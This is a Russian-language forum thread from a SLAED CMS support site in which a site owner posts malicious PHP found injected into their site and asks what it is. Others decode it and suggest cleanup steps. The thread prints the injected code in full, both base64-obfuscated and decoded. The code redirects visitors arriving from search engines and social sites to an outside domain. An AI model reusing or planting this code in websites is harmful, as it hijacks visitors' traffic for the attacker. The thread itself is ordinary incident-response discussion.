Мы в YouTube Мы в Twitter Мы вКонтакте Читайте нашу RSS
Чтение RSS каналов

Форум

Открыть Ответить

вставили вредоносный код

0

0
1
13.12.2012 12:12:4314.12.2012 17:15:42

eval(base64_decode(&quot;ZXJyb3JfcmVwb3J0aW5nKDApOwogJHFhenBsbT1oZWFkZXJzX3Nl<br /> bnQoKTsKaWYgKCEkcWF6cGxtKXsKICRyZWZlcmVyPSRfU0VSVkV<br /> SWydIVFRQX1JFRkVSRVInXTsKJHVhZz0kX1NFUlZFUlsnSFRUUF9VU<br /> 0VSX0FHRU5UJ107CiBpZiAoJHVhZykgewppZiAoc3RyaXN0cigkcmV<br /> mZXJlciwieWFuZGV4Iikgb3Igc3RyaXN0cigkcmVmZXJlciwieWFob28iKSBvciBzdHJpc3RyK<br /> CRyZWZ<br /> lcmVyLCJnb29nbGUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaW5nIikgb3Igc3RyaXN0cigkc<br /> mVmZXJlciwicmFtYmxlciIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImdvZ28iKSBvciBzdHJpc3RyKC<br /> RyZWZlcmVyLCJsaXZlLmNvbSIpb3Igc3RyaXN0cigkcmVmZXJlciwiYXBvcnQiKSBvciBzdH<br /> Jpc3RyKCRyZWZlcmVyLCJuaWdtYSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIndlYmFsdGEiKSB<br /> vciBzdHJpc3RyKCRyZWZlcmVyLCJiYWlkdS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJkb<br /> 3VibGVjbGljay5uZXQiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiZWd1bi5ydSIpIG9yIHN0cmlzd<br /> HIoJHJlZmVyZXIsInN0dW1ibGV1cG9uLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpd<br /> C5seSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInRpbnl1cmwuY29tIikgb3Igc3RyaXN0cigkcm<br /> VmZXJlciwiY2xpY2tiYW5rLm5ldCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJsb2dzcG90LmN<br /> vbSIpI<br /> G9yIHN0cmlzdHIoJHJlZmVyZXIsIm15c3BhY2UuY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZm<br /> FjZWJvb2suY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYW9sLmNvbSIpKSB7CiBpZiAoIXN0cmlz<br /> dHIoJHJlZmVyZXIsImNhY2hlIikgb3IgIXN0cmlzdHIoJHJlZmVyZXIsImludXJsIikpewogaGVhZG<br /> VyKCJMb2NhdGlvbjogaHR0cDovL2JyZWFraW5nYmFkLm9zYS5wbC8iKTsKIGV4aXQoKTsKIH0KIH0KfQoJfQ==&quot;));<br />


Что это?



Версия системы: SLAED CMS 4.* Pro
Версия PHP: PHP 5
Сервер: Сервер в интернете
СообщениеПрофильСайт
mafioz
2.95

2.95
2
13.12.2012 13:55:17

Такая же фигня была-Все js файлы заражены.

1 ПЕрезалей js - файлы
2 Смени пароль от фтп

Но самое главное проверь комп на наличие вирусов.

СообщениеПрофильСайт
ra55551
3.74

3.74
3
13.12.2012 15:37:05 

error_reporting(0);
 $qazplm=headers_sent();
if (!$qazplm){
 $referer=$_SERVER['HTTP_REFERER'];
$uag=$_SERVER['HTTP_USER_AGENT'];
 if ($uag) {
if (stristr($referer,"yandex") or stristr($referer,"yahoo") or stristr($referer,"google") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"baidu.com") or stristr($referer,"doubleclick.net") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"***.com") or stristr($referer,"clickbank.net") or stristr($referer,"blogspot.com") or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) {
 if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
 header("Location: http://breakingbad.osa.pl/");
 exit();
 }
 }
}
	}

Расшифровка...



Версия системы: SLAED CMS 5.* Pro
Версия PHP: PHP 5
Сервер: Сервер в интернете
СообщениеПрофильСайт
AlexFly
3.71

3.71
4
13.12.2012 18:35:40

Проверте Все файлы htaccess, угроза идет от смартфонов и планшетов под Андроид, которые имеют вирус и заходят на ваш сайт. Проблема серьезная, сам столкнулся, в сети мало инфо по этому поводу. Но мое мнение, что вирус лезет черех сервер хостера.



Версия системы: Open SLAED 1.*
Версия PHP: PHP 5
Сервер: Сервер в интернете
СообщениеПрофильСайт
lev
4

4
5
14.12.2012 17:17:58

Рекомендую
1. Обновить систему до актуальной версии.
2. Удалить редактор spaw2.

О сколько нам открытий чудных,
Готовит просвещенья дух,
И опыт, сын ошибок трудных,
И гений, парадоксов друг...
СообщениеПрофильСайт
SLAED CMS
3.24

3.24
6
15.12.2012 22:45:16

спасибо всем

СообщениеПрофильСайт
mafioz
2.95

2.95
7
27.12.2012 09:15:02

Тоже в свое время задавался аналогичным вопросом! Ответ как всегда нашел здесь! Спасибо!!!

СообщениеПрофильСайт
rofat
3.66

3.66
Открыть Ответить
Хотите опробовать SLAED CMS в действии?

Форум

Технологии

PHP MySQL HTML 5 CSS 3 jQuery jQuery UI

Контакты

  • D-49179, Deutschland
    Ostercappeln, Im Siek 6
  • +49 176 61966679

  • https://slaed.net
Идеи и предложения
Обратная связь